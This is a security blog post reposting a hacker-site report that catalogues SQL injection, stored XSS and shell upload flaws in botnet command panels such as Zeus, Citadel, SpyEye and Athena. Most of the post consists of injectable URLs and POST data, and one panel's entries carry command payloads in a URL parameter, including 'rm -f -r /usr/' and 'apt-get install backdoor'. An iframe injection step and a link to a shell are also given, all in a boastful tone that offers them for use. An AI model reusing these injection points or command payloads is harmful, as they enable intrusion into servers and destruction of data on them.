Never Ending Security

It starts all here

Exploit – Several Botnet(s) Vulnerabilities

Exploit – Several Botnet(s) Vulnerabilities!

BotNets are Mainly Created by Great Scripters, but some of them really LACK on Security!
A recent report made to siph0n.in by abdilo and asterea (@4sterea) identified How Un-Secure the Most Recent Botnets are!

Let’s give a look into it!

(1) BotNet is Vulnerable to Sh3ll Upload Vulnerability

iBanking

Type: Shell Upload

Sh3ll: *(2)

(18) BotNets are VULNERABLE to SQL Injection:

 Random panel

Type: SQLi
Vuln: http://site.com/g.php?id=1

 Athena

Type: SQLi
Vuln: http://localhost:8992/panel/gate.php?botid=1&newbot=1&country=AUD&country_code=AUD &ip=10.0.0.1&os=win&cpu=amd&type=mate&cores=1999&version=88.8&net=wlan&admin=narwals&busy=no&lastseen=now

Casinoloader

Type: SQLi
Vuln: http://localhost/gateway.php

POSTDATA page=1&val=1

 Citadel

Type: SQLi
Vuln: http://localhost/cp.php?bots=1

DLOADER

Type: SQLi
Vuln1: http://localhost/includes/get_kktocc.php?line=1
Vuln2: http://localhost/includes/update_url.php?fid=1

HERPES

SQL injection.

http://localhost/tasks.php POST: vote=1&submitted=1

JACKPOS

blindsqli after you login, pretty useless so i wont bother.

JHTTP

Some sqlinjection vulnerabilities past the assets folder.

SAKURA

Type: SQLi

http://localhost/func.php?showtopic=2 http://localhost/index.php?showtopic=322 http://localhost/sakuraadmin44.php?filename=1.png&cmd=rm%20-f%20-r%20%2Fusr%2F&edit=2312 http://localhost/sakuraadmin44.php?filename=1.png&cmd=apt-get%20install%20backdoor http://localhost/sakuraadmin44.php?link=http%3A%2F%2Fmetasploit.com%2F&threads=10 http://localhost/showthread.php?t=123 http://localhost/showthread.php?t=23&cmd=32

Type: SQLi – POST

http://localhost/sakuraadmin44.php?threads=222&link=21213.com POST: exploits=992.ds http://localhost/sakuraadmin44.php?threads=11 POST: snick=123&file=321&exploits=123 http://localhost/sakuraadmin44.php?threads=21 POST: snick=1

SILENCE WINLOCKER V5.0

SQL injection.

http://localhost/forma.php?pin=4322 http://localhost/index.php?x=1&act=delete&id=1 http://localhost/picture.php?pin=8787 http://localhost/tmp/get.php?pin=1334

SMOKE LOADER

Type: SQLi

http://localhost/control.php?id=1 http://localhost/guest.php?id=1

POST

SOLARBOT

SQL injection.

localhost/index.php POSTDATA i=1881&p=80&u=8302&h=282&s=AUD

SPY-EYE

Type: SQLi

http://localhost/frm_boa-grabber_sub.php?dt=11%2F11%2F1998

TINBA

Type: SQLi

\tinybanker panel\admin/control/logs.act.php http://localhost/logs.act.php Post Data: bot_uid=1&botcomment=mate

UMBRA

Type: SQLi

Vuln: http://localhost/delete_command.php?deleteID=1

VERTEXNET

There are sqlinjection vulnerabilities but the likely hood of you actually finding a way of exploiting them is low.

ZEUS AND ZEUS EVO

Type: SQLi

Vuln: http://localhost/gate.php?ip=8.8.8.8

ZSKIMMER

Type: SQLi

Vuln: http://localhost/process.php?xy=2

(3) BotNets are VULNERABLE to Cross-Site Scripting Vulnerability and Other Medium Issues:

CYTHOSIA BOTNET

Type: Stored XSS and iFrame redirect

Click add task Command: IFRAME SRC=”whateverekorlemonpartyorwhatnot.com” /IFRAME

Then Click Create Task Finally click Tasks. VOILA!

(Credits to asterea for finding this botnet panel)

CRIMEPACK 3.1.3

Secure shit, like no XSS’s or anything.

PLASMA

Some Cross site scripting vulns and nothing else so no use telling you about them.

Furthermore they have also identified (5) Secure Sh3lls :-)

Here you all can find the Secure Ones!

 Alin1

Nothing, unless logged in.

 Betabot

Nope.

 CRIMEPACK 3.1.3

Secure shit, like no XSS’s or anything.

SMSBOT

nothing interesting.

SPY POSCARDSTEALER

nope its secure.


If you all find any new Vulnerability, you can directly contact them below!

Contact: asterea@exploit.im

Twitter: 4sterea


(*)1 Source:

https://siph0n.in/exploits.php?id=3528

(*)2 iBanking Sh3ll:

http://pastebin.com/Dfczctfv

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s